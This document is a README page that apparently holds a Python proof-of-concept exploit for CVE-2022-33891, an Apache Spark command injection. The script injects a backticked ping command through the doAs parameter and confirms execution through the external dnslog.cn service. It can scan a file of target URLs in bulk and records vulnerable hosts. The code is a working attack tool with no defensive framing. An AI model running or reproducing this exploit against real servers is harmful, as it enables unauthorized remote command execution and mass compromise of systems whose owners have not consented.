README.md
Rendering markdown...
import requests
import time
import os
os.system('')
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
class apache_spark_cve_2022_33891_poc():
def banner(self):
print(r"""
______ _______ ____ ___ ____ ____ __________ ___ ___ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ /___ / ( _ )/ _ \/ |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \ |_ \ / _ \ (_) | |
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) | (_) \__, | |
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ \___/ /_/|_|
by:W01fh4cker
""")
def poc(self, target_url, domain, session):
url = f'{target_url}/?doAs=`ping {domain}`'
try:
res = session.get(url=url,verify=False, timeout=20)
return res.status_code
except Exception as e:
print("\033[31m[x] Request error: \033[0m" + str(e))
def dnslog_getdomain(self, session):
url = 'http://www.dnslog.cn/getdomain.php?t=0'
try:
res = session.get(url, verify=False, timeout=20)
return res.text
except Exception as e:
print("\033[31m[x] Request error: \033[0m" + str(e))
def dnslog_getrecords(self, session, target_url, domain, count):
url = 'http://www.dnslog.cn/getrecords.php?t=0'
try:
res = session.get(url, verify=False, timeout=20)
except Exception as e:
print("\033[31m[x] Request error: \033[0m" + str(e))
if domain in res.text:
if count == 0:
print(f'[+] Get {domain} infomation,target {target_url} is vulnerable!')
with open("CVE-2022-33891 vulnerable urls.txt", 'a+') as f:
f.write(target_url + "\n")
else:
print(f'[{str(count)}] Get {domain} infomation,target {target_url} is vulnerable!')
with open("CVE-2022-33891 vulnerable urls.txt", 'a+') as f:
f.write(target_url + "\n")
else:
print("\033[31m[x] Unvulnerable: \033[0m" + str(target_url))
def main(self, target_url, dnslog_url, file):
session = requests.session()
count = 0
self.banner()
if target_url and dnslog_url:
print('[+] Requesting dnslog--------')
status_code = self.poc(target_url, dnslog_url, session)
if status_code == 200:
print(f'[+] The response value is {status_code}, please check the dnslog information by yourself.')
elif target_url:
session = requests.session()
domain = self.dnslog_getdomain(session)
self.poc(target_url, domain, session)
self.dnslog_getrecords(session, target_url, domain, count)
elif file:
for url in file:
count += 1
target_url = url.replace('\n', '')
session = requests.session()
domain = self.dnslog_getdomain(session)
time.sleep(1)
self.poc(target_url, domain, session)
self.dnslog_getrecords(session, target_url, domain, count)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u',
'--url',
type=str,
default=False,
help="target url, you need to add http://")
parser.add_argument("-d",
'--dnslog',
type=str,
default=False,
help="dnslog address, without http://")
parser.add_argument("-f",
'--file',
type=argparse.FileType('r'),
default=False,
help="batch detection, you need to add http://")
args = parser.parse_args()
run = apache_spark_cve_2022_33891_poc()
run.main(args.url, args.dnslog, args.file)